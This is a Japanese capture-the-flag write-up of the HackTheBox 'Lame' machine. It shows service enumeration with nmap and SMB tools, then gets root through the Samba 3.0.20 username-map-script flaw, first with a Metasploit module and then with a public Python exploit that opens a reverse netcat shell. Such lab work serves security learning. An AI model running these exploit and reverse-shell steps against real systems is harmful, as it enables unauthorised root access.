🙆‍♀️

【HackTheBox】Lame WriteUp

2023/03/02に公開

はじめに

Linux MachineのLameやっていきます。Metasploitは使いたくなかったのですが、使うと簡単そうだったので使ってしまいました。使ってないものも載せてあります。
https://app.hackthebox.com/machines/1

やること

  • ポートスキャン
  • FtpとSambaを確認
  • Anonymousログイン
  • ファイル確認
  • バージョン確認、脆弱性チェック
  • metasploitまたはexploitコード
  • root権限の取得(user flag, root flag)

Enumeration

Nmapポートスキャン

nmap -sC -sV -Pn lame.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-01 23:34 EST
Nmap scan report for lame.htb (10.129.219.210)
Host is up (0.19s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.39
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h30m24s, deviation: 3h32m11s, median: 21s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2023-03-01T23:35:05-05:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.12 seconds
                                                                 

FTP: anonymous login
SAMBA: 試しにログインしてみる?

FTP port 21

login

ftp lame.htb
Connected to lame.htb.
220 (vsFTPd 2.3.4)
Name (lame.htb:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

特に何もありませんでした。

SAMBA port 445

Crackmapexec

crackmapexec smb lame.htb
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if result['type'] is not 'searchResEntry':
SMB         lame.htb        445    LAME             [*] Unix (name:LAME) (domain:hackthebox.gr) (signing:False) (SMBv1:True)

SMBmap

 smbmap -H lame.htb  
[+] IP: lame.htb:445    Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))

いくつかシェアがありますね、tmpしか見れないみたいです。
ServiceにSambaのバージョンが書いてあります、searchsploitしろということでしょうか?

tmp

smbclient //lame.htb/tmp    
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar  2 00:06:33 2023
  ..                                 DR        0  Sat Oct 31 03:33:58 2020
  .ICE-unix                          DH        0  Wed Mar  1 23:25:04 2023
  vmware-root                        DR        0  Wed Mar  1 23:26:15 2023
  .X11-unix                          DH        0  Wed Mar  1 23:25:29 2023
  .X0-lock                           HR       11  Wed Mar  1 23:25:29 2023
  vqeu                                N        0  Thu Mar  2 00:04:31 2023
  5573.jsvc_up                        R        0  Wed Mar  1 23:26:15 2023
  vgauthsvclog.txt.0                  R     1600  Wed Mar  1 23:25:03 2023

                7282168 blocks of size 1024. 5385800 blocks available

特に何もありません。

Searchsploit

 searchsploit samba 3.0.20                                                      
----------------------------------------------------------------- ---------------------------------
 Exploit Title                                                   |  Path
----------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass           | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execut | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                            | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                    | linux_x86/dos/36741.py
----------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

16320.rbが面白そうですね。
Samba 3.0.0 - 3.0.25rc3 はRemote Code Injection Vulnがあることがわかりました。
https://www.exploit-db.com/exploits/16320

Foothold

Metasploit

msf6 > search samba 3.0.20

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) >

Set Rhosts and Lhost and run it.

Root

msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.39:4444 
[*] Command shell session 2 opened (10.10.14.39:4444 -> 10.129.219.210:46488) at 2023-03-01 23:57:08 -0500

whoami
root

User flag

cd /home/makis
ls
user.txt

Root flag

cd /home/makis
ls
user.txt
cd /root
ls
Desktop
reset_logs.sh
root.txt
vnc.log

以上でおしまいです。

No metasploit

metasploitが嫌な場合はpythonscriptがあります。

Python script

https://github.com/amriunix/CVE-2007-2447

pysmbも必要なのでダウンロードします。
https://github.com/miketeo/pysmb/releases/tag/pysmb-1.2.9.1

以下のようにフォルダを並べると実行することができました。

Exploit

python3 usermap_script.py lame.htb 139 10.10.14.39 1234
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
 nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.39] from (UNKNOWN) [10.129.219.210] 40796
whoami
root

metasploit同様ぱっと権限を取れてしまいました。

Discussion